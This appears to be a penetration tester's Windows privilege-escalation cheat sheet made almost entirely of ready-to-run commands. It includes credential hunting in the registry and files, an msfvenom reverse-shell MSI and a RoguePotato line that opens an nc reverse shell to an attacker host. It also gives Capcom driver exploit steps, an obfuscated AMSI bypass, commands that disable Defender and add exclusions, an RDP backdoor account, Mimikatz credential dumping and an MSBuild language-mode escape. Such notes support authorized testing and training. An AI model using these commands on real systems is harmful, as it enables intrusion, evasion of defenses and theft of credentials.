Windows
System enumeration
hostname
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" # /B Matches the text pattern if it is at the beginning of a line.
wmic qfe # extract patches (KB), wmic = windows management instrumentation cmd line, qfe = quick fix engineering
wmic qfe get Caption,Description,HotFixID,InstalledOn # extract patches with these specifics columns
wmic logicaldisk
wmic logicaldisk get caption,description,providername # look if there is other existing drives
Users enumeration
whoami /all
net users
net user administrator
wmic useraccount list brief # includes SID
net localgroup
net localgroup administrators
Network enumeration
ipconfig
ipconfig /all
arp -a
route print
netstat -ano
# fport supports Windows NT4, Windows 2000 and Windows XP
# fport reports all open TCP/IP and UDP ports and maps them to the owning application.
Fport.exe /p
Antivirus and Firewall enumeration
sc query windefend # sc = service control, windefend is the default windows antivirus
sc queryex type= service # all the services running, search for AV such as sophos, avast...
netsh advfirewall firewall dump # modern command, show firewall state
netsh firewall show state # old comand
netsh firewall show config
Account lockout
PowerShell Enumeration
Tools
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Kernel Exploit
- https://github.com/SecWiki/windows-kernel-exploits
- https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
Password Hunting
Enumerate folders
tree /f /a # in users directory
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt *.conf* # search for file contents
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* # search filename
Unattend files
MSFPowerShell history
type C:\Users\theuser\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Unmounted volumes
Search registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
mRemoteNG
- https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
HiveNightmare
- https://github.com/GossiTheDog/HiveNightmare
Stored credentials
WSL
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
Registry
Autorun
Always Install Elevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$VPN LPORT=443 -f msi -o rev.msi
msiexec /quiet /qn /i C:\Windows\Tasks\rev.msi
Drivers
- the driver directory is often found under C:\Windows\System32\DRIVERS but sometimes in "C:\Program Files". Drivers are .inf filetype.
Compile C/C++ code on Windows: https://www.mingw-w64.org/
Impersonation Privileges
Restore Privileges
- This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
- https://github.com/itm4n/FullPowers
SeImpersonatePrivilege
-
https://jlajara.gitlab.io/Potatoes_Windows_Privesc
-
Sweet Potato to rule them all : https://github.com/CCob/SweetPotato
-
If the machine is < Windows 10 1809 < Windows Server 2019 : https://github.com/ohpe/juicy-potato/
- test for clsid : https://github.com/ohpe/juicy-potato/tree/master/CLSID
-
If the machine is >= Windows 10 1809 & Windows Server 2019 :
-
https://github.com/antonioCoco/RoguePotato
# On attacking machine
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
# On victim machine
.\RoguePotato.exe -r ATTACKING_IP -e "C:\Windows\Tasks\nc.exe ATTACKING_IP 1234 -e cmd.exe" -l 9999
- https://github.com/itm4n/PrintSpoofer
SeLoadDriver
- Explainations : https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
- Walkthrough : https://0xdf.gitlab.io/2020/10/31/htb-fuse.html#priv-svc-print--system
- Load the vulnerable driver : https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
- Capcom.sys, a vulnerable driver : https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
- Exploit Capcom : https://github.com/tandasat/ExploitCapcom
Compile the files using Visual Studio. Release / x64 -> Build. Remove the include "stdafx.h" if error. You should modify the TCHAR CommandLine[] = TEXT("C:\Windows\system32\cmd.exe"); launched in the exploit first. Replace by a rev generated using msfvenom. Load then exploit the vulnerable driver.
./EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Users\svc-print\Capcom.sys
./ExploitCapcom.exe
Unquoted Service Paths
- When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
# find unquoted service
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# check if running as system or admin
sc qc <service_name>
# check path
icacls <service_path>
# After creating or replacing the binary by a malicious one
# if start type is Auto, you need SeShutdownPrivilege to reboot
shutdown /r /t 0
Localhost services
Chisel
- https://github.com/jpillora/chisel
Access localhost port 8888 on victim machine from attacking machine
./chisel_1.7.7_linux_amd64 server -p 9876 --reverse # attacking machine
./chisel_1.7.7_windows_amd64 client 10.10.14.20:9876 R:8888:127.0.0.1:8888 # victim machine
AMSI bypass
$a=[Ref].Assembly.GetTypes();$a | %{$b=$_; $count=0; $tmp=($_.Name).ToCharArray().ToInt32($null); $tmp | %{$count+= $_;}; if($count -eq 923){$c=$b}};$d=$c.GetFields('NonPublic,Static');$d | %{$e=$_; $count=0; $tmp=($_.Name).ToCharArray().ToInt32($null); $tmp | %{$count+= $_;}; if($count -eq 1167){$f=$e}};$o=1;while($o -lt 8){Start-Sleep -Milliseconds ($o.toInt32($null)*100);$o++};$g=$f.GetValue($null);[IntPtr]$x=$g;[Int32[]]$y=@(0);$cop=[System.Runtime.InteropServices.Marshal];$i=1;while($i -lt 5){Start-Sleep -Milliseconds ($i.toInt32($null)*100);$i++};$cop::Copy($y, 0, $x, 1);
Add admin account Windows
Add exclusions
Set-MpPreference -DisableRealTimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning 1
Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
Set-MpPreference -ExclusionProcess "legit.txt","powershell.exe","msbuild.exe"
Bypass UAC
- https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
Disable UAC remote restrictions
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "LocalAccountTokenFilterPolicy" -Value 1 -PropertyType DWord -Force
Enable RDP from CLI
- https://support.moonpoint.com/os/windows/software/remote-control/rdp/rdp-registry.php
net localgroup "Remote Desktop Users" /add pentest
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -ano | find "3389"
netsh firewall set portopening protocol = TCP port = 3389 name = "RDP" mode = ENABLE scope = CUSTOM $LHOST
rdesktop $IP -u pentest -p Pentest1!
Admin to System
- https://twitter.com/cyb3rops/status/1448208520680284164
Mimikatz one liner
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::tickets" "exit"
Escape PowerShell CLM
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="MSBuild">
<MSBuildTest/>
</Target>
<UsingTask
TaskName="MSBuildTest"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Linq;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class MSBuildTest : Task, ITask
{
public override bool Execute()
{
using (var runspace = RunspaceFactory.CreateRunspace())
{
runspace.Open();
using (var posh = PowerShell.Create())
{
posh.Runspace = runspace;
posh.AddScript("$ExecutionContext.SessionState.LanguageMode");
var results = posh.Invoke();
var output = string.Join(Environment.NewLine, results.Select(r => r.ToString()).ToArray());
Console.WriteLine(output);
}
}
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
PowerShell proxy related
// System.Net.WebClient is by default proxy aware
$wc = new-object system.net.WebClient
$wc.DownloadString("https://your-url/test.txt")
// Check the proxy
[System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://your-url/")
// Remove the proxy
$wc.proxy = $null
// Add a custom user agent
$wc.Headers.Add('User-Agent',"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0")
// Discover and set proxy
[System.Net.WebRequest]::DefaultWebProxy = [System.Net.WebRequest]::GetSystemWebProxy()
[System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials